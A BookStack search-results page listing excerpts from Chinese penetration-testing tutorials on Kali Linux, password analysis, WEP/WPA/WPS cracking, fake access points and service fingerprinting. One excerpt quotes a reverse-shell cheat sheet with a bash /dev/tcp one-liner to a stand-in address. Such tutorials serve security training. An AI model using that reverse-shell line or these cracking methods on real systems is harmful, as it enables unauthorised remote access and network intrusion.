书栈网 · BookStack 本次搜索耗时 0.019 秒,为您找到 148 个相关结果.
  • Part 11 - Hacking Character Primitive Datatype

    Part 11 - Hacking Character Primitive Datatype Part 11 - Hacking Character Primitive Datatype For a complete table of contents of all the lessons please click below as it will ...
  • 8.8 使用NVIDIA计算机统一设备架构(CUDA)

    8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.8 使用NVIDIA计算机统一设备架构(CUDA) CUDA(Compute Unified Device Architecture)是一种由NVIDIA推出的通用并行计算架构,该架构使用GPU能够解决复杂的计算问题。它包含了CUDA指令集架构(ISA)及GPU内部的并行计算引擎。用户可以使...
  • 8.2 分析密码

    8.2 分析密码 8.2.1 Ettercap工具 8.2.2 使用MSFCONSOLE分析密码 8.2.3 哈希值识别工具Hash Identifier 8.2 分析密码 在实现密码破解之前,介绍一下如何分析密码。分析密码的目的是,通过从目标系统、组织中收集信息来获得一个较小的密码字典。本节将介绍使用Ettercap工具或MSFCONSOLE...
  • 9.2 使用Aircrack-ng工具破解无线网络

    9.2 使用Aircrack-ng工具破解无线网络 9.2.1 破解WEP加密的无线网络 Data:被捕获到的数据分组的数量,包括广播分组。 /s:过去10秒钟内每秒捕获数据分组的数量。 9.2.2 破解WPA/WPA2无线网络 9.2.3 攻击WPS(Wi-Fi Proteced Setup) 9.2 使用Aircrack-ng工具破解无...
  • 第三章 高级测试环境

    第三章 高级测试环境 简介 3.1 熟悉 VirtualBox 准备 操作步骤 工作原理 更多 3.2 下载 Windows 靶机 准备 操作步骤 3.3 下载 Linux 靶机 准备 操作步骤 3.4 攻击 WordPress 和其它应用 准备 操作步骤 更多 第三章 高级测试环境 作者:Willie L. Pri...
  • 获取shell

    获取shell 常规shell反弹 几个常用: 突破防火墙的imcp_shell反弹 Shell反弹不出的时候 正向shell 获取shell 常规shell反弹 几个常用: 1 、 bash - i >& / dev / tcp / 10.0 . 0.1 / 8080 0 >& 1 2 、 python - c ...
  • 3.1 使用VMware Workstation

    3.1 使用VMware Workstation 3.1 使用VMware Workstation 在第1章简略地讲解了在VMware Workstation上安装Kali Linux虚拟环境的过程。VMware Workstation允许安装操作系统并且运行虚拟环境。这个工具是非常重要的,它可以为熟悉Kali Linux功能提供了目标主机。本书中使...
  • 9.1 无线网络嗅探工具Kismet

    9.1 无线网络嗅探工具Kismet 9.1 无线网络嗅探工具Kismet 如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点。刚好在Kali Linux中,提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。 (1)启动Kismet工具。执行命...
  • 9.3 Gerix Wifi Cracker破解无线网络

    9.3 Gerix Wifi Cracker破解无线网络 9.3.1 Gerix破解WEP加密的无线网络 9.3.2 使用Gerix创建假的接入点 9.3 Gerix Wifi Cracker破解无线网络 Gerix Wifi Cracker是另一个aircrack图形用户界面的无线网络破解工具。本节将介绍使用该工具破解无线网络及创建假的接入点。...
  • 4.6 服务的指纹识别

    4.6 服务的指纹识别 4.6.1 使用Nmap工具识别服务指纹信息 4.6.2 服务枚举工具Amap 4.6 服务的指纹识别 为了确保有一个成功的渗透测试,必须需要知道目标系统中服务的指纹信息。服务指纹信息包括服务端口、服务名和版本等。在Kali中,可以使用Nmap和Amap工具识别指纹信息。本节将介绍使用Nmap和Amap工具的使用。 ...